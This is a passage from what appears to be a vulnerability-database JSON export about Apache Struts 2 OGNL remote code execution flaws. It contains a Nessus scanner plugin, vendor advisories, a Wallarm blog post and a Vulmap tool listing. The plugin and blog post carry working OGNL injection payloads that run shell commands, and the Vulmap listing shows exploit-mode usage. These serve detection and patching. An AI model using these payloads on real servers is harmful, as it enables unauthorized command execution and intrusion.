\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.", "edition": 26, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-06-19T00:00:00", "title": "Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966", "CVE-2013-1965", "CVE-2013-2115"], "modified": "2013-06-19T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66935);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1965\", \"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60082, 60166, 60167);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution\");\n script_summary(english:\"Attempts to double evaluate an action.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. 
\n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-014.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts Showcase < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/22\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp /.do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is 
slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"/${%23context['xwork.MethodAccessor.denyMethod\" +\n \"Execution']=!(%23_memberAccess['allowStaticMethodAccess']=true),\" +\n \"(@java.lang.Runtime@getRuntime()).exec('\" +cmd+ \"').waitFor()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/(0)?\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-26T10:43:36", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a\nremote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. 
A\nremote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code\ninto the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "title": "Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966"], "modified": "2018-09-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117401", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117401);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/25\");\n\n script_cve_id(\"CVE-2013-1966\");\n script_bugtraq_id(60166);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a\nremote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. 
A\nremote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code\ninto the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.exploit-db.com/exploits/25980\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3ab6fd3\");\n # https://cwiki.apache.org/confluence/display/WW/S2-013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0b2a9311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1966\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/16\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n \n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.14', 'fixed_version' : '2.3.14.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:28", "bulletinFamily": "software", "cvelist": ["CVE-2013-2248", "CVE-2013-1966", "CVE-2013-2251", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2014-01-08T00:00:00", "published": "2013-07-30T00:00:00", "id": "HUAWEI-SA-20130730-STRUTS", "href": "https://www.huawei.com/en/psirt/security-advisories/2013/hw-276819", "title": 
"Security Advisory-Multiple Apache Struts2 Vulnerabilities in Huawei Products", "type": "huawei", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966"], "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-10-12T00:00:00", "published": "2013-05-22T00:00:00", "id": "E-319", "href": "", "type": "dsquare", "title": "Apache-Struts IncludeParams < 2.3.14.1 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-10-18T00:00:00", "published": "2013-10-18T00:00:00", "id": "E-340", "href": "", "type": "dsquare", "title": "Apache-Struts IncludeParams < 2.3.14.2 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T19:19:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "edition": 2, "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. 
Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-07-18T00:00:00", "published": "2013-07-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "id": "SAINT:1D34925730D76AB12F475B2A125AC017", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. 
\n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-07-18T00:00:00", "published": "2013-07-18T00:00:00", "id": "SAINT:2158B27B9EAB9B393EED3784C4096BC1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. 
\n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-07-18T00:00:00", "published": "2013-07-18T00:00:00", "id": "SAINT:828C60321F2ABC177EBA08F435872B1B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "wallarmlab": [{"lastseen": "2017-05-01T13:42:41", "bulletinFamily": "blog", "cvelist": ["CVE-2013-1966", "CVE-2013-2251", "CVE-2012-0391", "CVE-2008-6504", "CVE-2012-0838", "CVE-2016-0785", "CVE-2010-1870", "CVE-2013-1965", "CVE-2012-4387", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2016-3093"], "description": "Two days ago Apache published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\nStruts2 RCE attacks in the wild\n\nThis vulnerability allows an attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that we caught the first exploit for this vulnerability in the wild. And this is crazy. Like previous OGNL exploits, this one is also based on OGNL macros to construct and call a shell command via a sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) first caught the exploit on Mar 8, 03:34 am. 
Please look at the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately you should apply a virtual patch to your WAF. It\u2019s essentially similar to the previous OGNL exploits; however, it\u2019s likely not to be covered by many existing WAF signatures. 
If using an old-fashioned Web Application Firewall, make sure to add this string as a new signature:\n \n \n %{(#_=\u2019multipart/form-data\u2019)\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nIt means that the OGNL technology is broken altogether.\n\n\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "modified": "2017-03-10T16:52:09", "published": "2017-03-09T00:15:54", "href": "https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "type": "wallarmlab", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2020-12-25T15:23:36", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9791", "CVE-2020-2551", "CVE-2019-6340", "CVE-2011-3923", "CVE-2018-7600", "CVE-2013-1966", "CVE-2020-14882", "CVE-2020-2883", 
"CVE-2018-2894", "CVE-2018-20062", "CVE-2010-1428", "CVE-2019-7238", "CVE-2017-3506", "CVE-2013-2251", "CVE-2014-4210", "CVE-2017-12629", "CVE-2020-10199", "CVE-2019-0193", "CVE-2018-7602", "CVE-2015-7501", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2017-12615", "CVE-2019-0230", "CVE-2010-1870", "CVE-2016-4437", "CVE-2017-9805", "CVE-2020-2729", "CVE-2013-2134", "CVE-2020-1938", "CVE-2019-9082", "CVE-2019-2725", "CVE-2010-0738", "CVE-2018-1000861", "CVE-2019-17558", "CVE-2017-1000353", "CVE-2016-3081", "CVE-2020-2555", "CVE-2019-2729"], "description": "Vulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, CMS and other Web applications, and it also has exploitation functions. Testers can use vulmap to detect whether a target has a specific vulnerability, and can use the exploitation function to verify that the vulnerability actually exists. \n\nVulmap currently has a vulnerability scanning (poc) mode and an exploiting (exp) mode. Use \"-m\" to select the mode; poc is the default. In poc mode it also supports \"-f\" batch target scanning, \"-o\" file output of results and other main functions; for the other options see [ Options ](<https://github.com/zhzyker/vulmap/#options>) or run python3 vulmap.py -h. In exp mode the poc check is not run: the exploit is carried out directly and its result is reported, which further verifies whether the vulnerability exists and whether it can be exploited. 
\n\n** Try to use \"-a\" to specify the target type to reduce false positives, such as \"-a solr\" **\n\n \n\n\n### Installation \n\nThe operating system must have python3; python3.7 or higher is recommended \n\n * Installation dependency \n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows \n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options \n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. default is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. 
-o \"result.txt\")\n \n\n \n\n\n### Examples \n\nTest all vulnerabilities in poc mode \n \n \n python3 vulmap.py -u http://example.com\n \n\nFor an RCE vuln, use the \"id\" command to test it, because some Linux systems do not have the \"netstat -an\" command \n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck [ http://example.com ](<http://example.com>) for struts2 vulns \n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on [ http://example.com:7001 ](<http://example.com:7001>)\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt \n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt \n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilities List \n\nThe vulnerabilities Vulmap supports are as follows \n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, 
cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y 